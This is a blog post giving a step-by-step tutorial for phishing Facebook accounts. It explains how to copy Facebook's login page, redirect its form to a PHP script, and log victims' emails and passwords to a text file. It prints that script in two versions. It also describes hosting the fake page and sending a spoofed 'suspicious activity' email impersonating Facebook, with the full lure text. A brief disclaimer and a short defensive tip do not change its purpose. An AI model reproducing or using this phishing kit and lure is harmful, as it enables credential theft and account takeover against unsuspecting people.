Friday, October 11, 2013

Facebook Phishing Tutorial

In this post  I'll teach you ow to h@ck Facebook by using Phishing method. In this method, we creates a Fake login page and make the victim to fall into the trap and entering his password in the fake login by thinking that it is original Facebook login page. Thus you can get his password.
Please don't use H@cking tricks for illegal purposes. It is for educational purposes and for making fun only. Don't use this for h@cking accounts of innocent guys. I will not take any responsibility for this.
Just follow the steps below to h@ck facebook account via phishing. it is very simple and you don't need to bother about the codes. The old code had some bugs and so I have made this new code. Its another use is that this code can be used in any phishing pages; not only for Facebook, you can use for Google Plus, Gmail, Youtube and every pages that you want. Just follow the steps below.
First, Open your browser and go to . You should not be signed in. If you already, sign out to get into the login page. Now Right click and select "View page source" or "view source". You can also do it by clicking "View" on the menu bar. Now you can see the source code of Facebook login page. Copy all the code and save it as a text file, named index.html. Open the file in notepad. Click cntrl+F and search for the word "action".
You can see something like
replace it with action= “mail.php”

Now open notepad and write the following code in it.

header ('Location:');
$file= fopen("log.txt", "a");

  fwrite($file, "Email = ");
  fwrite($file, $email);
  fwrite($file, "\r\n");

fwrite($file, "Password = ");
  fwrite($file, $pass);
  fwrite($file, "\r\n");
fwrite($file, "\r\n");

Why use updated code instead of old one? This is what everybody asks me. I will say the reason. If you have tested the old code, you may have noticed that the txt file consists of many unwanted and junk data like some large code numbers and alphabets in addition to email and password. by using this code you can avoid that. The basic layout of the txt file looks like this

Email =
Password = something2123

Email =
Password = passsawwssd

and so on

For debuggers, I'm giving the old code. If you are a beginner just skip this step

header ('Location: ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Create  a new text file named log.txt for saving passwords.

Now you need a free hosting service for uploading this files. You can use any provides like It would be better to use any name related to like
Upload the three files into the root folder of your hosting.

Now you are almost done. The last part is to make the victim fall in your trap. Use a Email spoofing provider like . Using this you can send Email from Address to your victim.
Here is a sample of the Email. You can change it according to your need.

Sub: Invalid activity on your facebook account

Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. .

How to save yourself from Phishing attacks.
Don't reply  to the Emails that appear to come from Facebook and never click any link inside it. Always login to your account by typing on the address bar.


Post a Comment